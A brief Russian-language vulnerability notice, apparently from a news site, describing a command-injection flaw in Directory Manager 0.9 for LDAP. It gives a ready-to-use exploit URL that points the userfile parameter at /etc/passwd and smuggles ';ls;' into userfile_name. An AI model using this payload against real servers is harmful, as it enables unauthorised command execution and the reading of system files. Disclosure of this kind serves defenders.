Directory Manager - "фишка", которая руководит данными каталога LDAP. В его составе: независимый редактор, утилита для просмотра схем и некоторые виды данных. Уязвимость защиты в программе позволяет выполнить произвольную команду.

Уязвимость работает на Directory Manager версии 0.9

http://victim.host/edit_image.php?dn=1& userfile=/etc/passwd&userfile_name=%20;ls;%20

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии